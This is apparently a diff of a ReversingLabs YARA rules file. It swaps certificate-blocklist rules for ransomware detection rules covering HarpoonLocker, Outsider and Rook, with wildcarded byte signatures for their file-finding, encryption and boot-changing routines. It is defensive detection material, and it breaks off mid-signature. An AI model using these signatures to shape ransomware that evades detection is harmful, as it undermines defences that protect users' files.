+            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 F9 ?? 0F
+            43 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 C2 03 85 ?? ?? ?? ?? 83 F9 ?? 8B F8
+            0F 43 DA 33 F6 2B FB 3B D8 0F 47 FE 85 FF 74
+        }
+		$encrypt_files = {
+            8A 01 41 84 C0 75 ?? 2B CA C6 85 ?? ?? ?? ?? ?? 33 C0 88 84 05 ?? ?? ?? ?? 40 3D ??
+            ?? ?? ?? 72 ?? 33 F6 8B C6 33 D2 F7 F1 8A 04 3A 02 C1 30 84 35 ?? ?? ?? ?? 46 81 FE
+            ?? ?? ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 55 ?? 8B F8 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            D8 85 FF 74 ?? 85 DB 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B F0 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 56 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
+            83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8
+            ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B
+            41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ??
+            E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D
+            ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ??
+            2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8
+            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B
+            C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ??
+            ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and ( pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" or pe.signatures [ i ] . serial == "d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" ) and 1599041760 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files_1_0 and $find_files_1_1 and $find_files_1_2 and $encrypt_files
 }
-
-rule REVERSINGLABS_Cert_Blocklist_E04A344B397F752A45B128A594A3D6B5 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Harpoonlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HarpoonLocker ransomware."
 		author = "ReversingLabs"
-		id = "b396e08c-b7dc-5498-9c68-2d8cdc5dd3d3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3605d354-5a33-54b1-83ad-ad514c78357b"
+		date = "2022-01-27"
+		modified = "2022-01-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4518-L4536"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0489577c6050f0c5d1dad5bda8c4f3c895902b932cd0324087712ccb83f14680"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.HarpoonLocker.yara#L1-L96"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "20587f9dce5981934498d9979843a090224ba649def8b694adf7799b7060cc25"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HarpoonLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 6F
+            ?? ?? ?? ?? 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 25 06 07 9A 7D
+            ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? 26 07 17 58 0B 07 06 8E
+            69 32 ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 73 ?? ?? ?? ?? 0D
+            09 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ??
+            ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 12 ??
+            12 ?? 28 ?? ?? ?? ?? 12 ?? 12 ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 59 13 ?? 72 ?? ?? ?? ?? 11
+            ?? 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 2C ?? 20 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 2B ?? 2A
+        }
+		$encrypt_files_p2 = {
+            12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 02 16 12 ?? 28
+            ?? ?? ?? ?? 26 08 7B ?? ?? ?? ?? 0D 08 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 35 ?? 08 7B ?? ??
+            ?? ?? 16 36 ?? DD ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 10 ?? 03 03 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 03 6F ?? ?? ?? ?? 16 11 ?? 16 1F ?? 28 ?? ?? ?? ?? 03
+            6F ?? ?? ?? ?? 16 11 ?? 1F ?? 1F ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 1F ?? 6A
+            13 ?? 17 13 ?? 09 6E 13 ?? 2B ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 59 13 ?? 11 ?? 11 ?? 30
+            ?? 02 19 17 7E ?? ?? ?? ?? 19 20 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ??
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 09 20 ??
+            ?? ?? ?? 58 14 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ??
+            06 1F ?? 16 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
+            DD ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 16 13 ?? 16 13 ?? 2B ?? 11 ?? 20 ?? ?? ?? ?? 2F
+            ?? 09 6E 11 ?? 6A 59 13 ?? 11 ?? D4 8D ?? ?? ?? ?? 13 ?? 11 ?? 17 58 11 ?? 33 ?? 11 ??
+            D4 8D ?? ?? ?? ?? 13 ?? 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 8E 69 28 ?? ?? ?? ?? 11
+            ?? 18 5D 2D ?? 11 ?? 8E 69 1F ?? 33 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 07 11
+            ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 11 ?? 11 ?? 8E 69 58 13 ?? 11 ?? 17 58 13
+            ?? 11 ?? 11 ?? 3F ?? ?? ?? ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 16 07 09 28 ?? ?? ?? ??
+            11 ?? 8E 69 28 ?? ?? ?? ?? 2B ?? 11 ?? 16 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ??
+            ?? ?? DE ?? 26 DE ?? 26 DE ?? 00 07 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 00 06 28 ?? ?? ??
+            ?? 26 DE ?? 26 DE ?? DC 2A
+        }
+		$find_files = {
+            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 2C ?? 2A 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 14 0B 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B DE ?? 26
+            DE ?? 07 2C ?? 07 8E 16 FE 01 2B ?? 17 0C 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13
+            ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 08 2C ?? 11 ?? 7B ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ??
+            26 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 08 2C ?? DD ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17
+            6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 07 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ??
+            ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
+            7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? ?? ?? ?? 11 ?? FE 06 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 11 ?? 7B ?? ?? ?? ?? 09 28 ?? ?? ?? ?? DE
+            ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 09 6F ?? ?? ?? ?? DE ?? 26 DE
+            ?? DE ?? 26 DE ?? 2A
+        }
+		$change_boot = {
+            02 8E 2C ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 28 ??
+            ?? ?? ?? 2A 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 28 ?? ?? ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and ( pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" or pe.signatures [ i ] . serial == "e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" ) and 1597708800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $change_boot ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Outsider : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Outsider ransomware."
 		author = "ReversingLabs"
-		id = "0aea5110-569b-5d9c-a2ce-a6a9fe75b58e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "44edccb1-9e2a-5ff9-b4b5-72ceec2f7947"
+		date = "2020-10-23"
+		modified = "2020-10-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4538-L4554"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dbf85cbd1d92823287749dac312f95576900753f60a694347b31b1e3aaa288a8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Outsider.yara#L1-L88"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "80c5a93b5b72b7b66e36f1726486b0c7620588d05bd925510d76f020a40b124c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Outsider"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 8B D9 50 6A ?? 5E 56 FF 35 ?? ?? ?? ??
+            89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 55 ?? 89 75 ?? 8B CF 2B
+            D7 8A 04 0A 88 01 41 83 EE ?? 75 ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 56 FF 35 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? 89 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
+            04 43 83 E8 ?? 66 83 38 ?? 75 ?? FF B6 ?? ?? ?? ?? 2B C3 83 C0 ?? D1 F8 8D 04 43 50
+            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ??
+            8B F0 FF 15 ?? ?? ?? ?? 3B C6 74 ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 83 FE ?? 72 ?? EB ??
+            C7 45 ?? ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B D8 33 C0 50 8D 45 ?? 50 68 ?? ?? ??
+            ?? 53 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 33 C0 89 4D ?? 3B C8 76 ?? 8B F8 8B C7 25 ?? ??
+            ?? ?? 79 ?? 48 83 C8 ?? 40 89 45 ?? 75 ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50
+        }
+		$encrypt_files_p2 = {
+            51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 45 ?? 8A 84 05
+            ?? ?? ?? ?? 30 04 1F 47 8B C7 99 85 D2 72 ?? 77 ?? 3B C1 72 ?? 8B 4D ?? 8B 7D ?? 6A
+            ?? F7 D9 8B C1 6A ?? 99 52 50 57 FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 FF 75 ?? 53
+            57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 53 33
+            C0 50 FF D6 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 5D ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ??
+            50 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D
+            45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 6A ?? 57
+            FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50
+            FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 FF 15 ?? ?? ?? ?? 56 33 F6 56 FF 15 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? EB ?? 33 F6 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$find_files = {
+            8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? 6A ?? FF
+            D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ??
+            0F 84 ?? ?? ?? ?? 8B D8 33 FF FF B7 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 C7 ?? 83 FF ?? 72 ?? 8D 44 24 ?? 50 FF 75 ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ??
+            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56
+            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$enum_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ??
+            83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? EB ?? 33
+            DB 39 5C 24 ?? 76 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? EB ?? FF
+            36 E8 ?? ?? ?? ?? 43 83 C6 ?? 59 3B 5C 24 ?? 72 ?? 8D 44 24 ?? 50 57 8D 44 24 ?? 50
+            FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" and 1599091200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_56D576A062491Ea0A5877Ced418203A1 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Rook : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Rook ransomware."
 		author = "ReversingLabs"
-		id = "3db67353-6310-54ad-b46a-97daf63fee42"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "60bbfd57-18bb-58b3-9abc-ab30943bbddd"
+		date = "2022-01-17"
+		modified = "2022-01-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4556-L4572"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "19bd6834b432f3dc8786b449241082b359275559a112a8ef4a51efe185b256dc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Rook.yara#L1-L122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dc8b37e55b634de52855dd851dbaaf3e690adfb2e875d0e0c9ef5f4846c6ff30"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Rook"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            48 2B D6 48 8D 4C 24 ?? 48 FF C2 41 B8 ?? ?? ?? ?? F6 D8 4D 1B FF 4C 23 FA 33 D2 E8
+            ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CE FF 15
+            ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CE E8 ?? ?? ??
+            ?? 8B F8 48 83 FB ?? 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ??
+            48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F
+            5E 5D C3 49 8B 6E ?? 49 2B 2E 48 C1 FD ?? 80 7C 24 ?? ?? 75 ?? 8A 44 24 ?? 84 C0 74
+            ?? 3C ?? 75 ?? 40 38 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D6 E8 ??
+            ?? ?? ?? 85 C0 75 ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06
+            49 8B 56 ?? 48 2B D0 48 C1 FA ?? 48 3B EA 0F 84 ?? ?? ?? ?? 48 2B D5 48 8D 0C E8 4C
+            8D 0D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_files_p1 = {
+            40 55 53 56 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? 0F
+            B6 05 ?? ?? ?? ?? F2 0F 11 44 24 ?? 88 44 24 ?? E8 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 CE ?? 48 8D 4C 24 ?? 89 35 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24
+            ?? FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0
+            0F 57 C9 F3 0F 7F 05 ?? ?? ?? ?? F3 0F 7F 0D ?? ?? ?? ?? F3 0F 7F 05 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 85 C0 48 89 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F 44 0D ?? ?? ??
+            ?? 48 89 0D ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C0 48 8D 15 ?? ??
+            ?? ?? 4C 63 C0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 15 ??
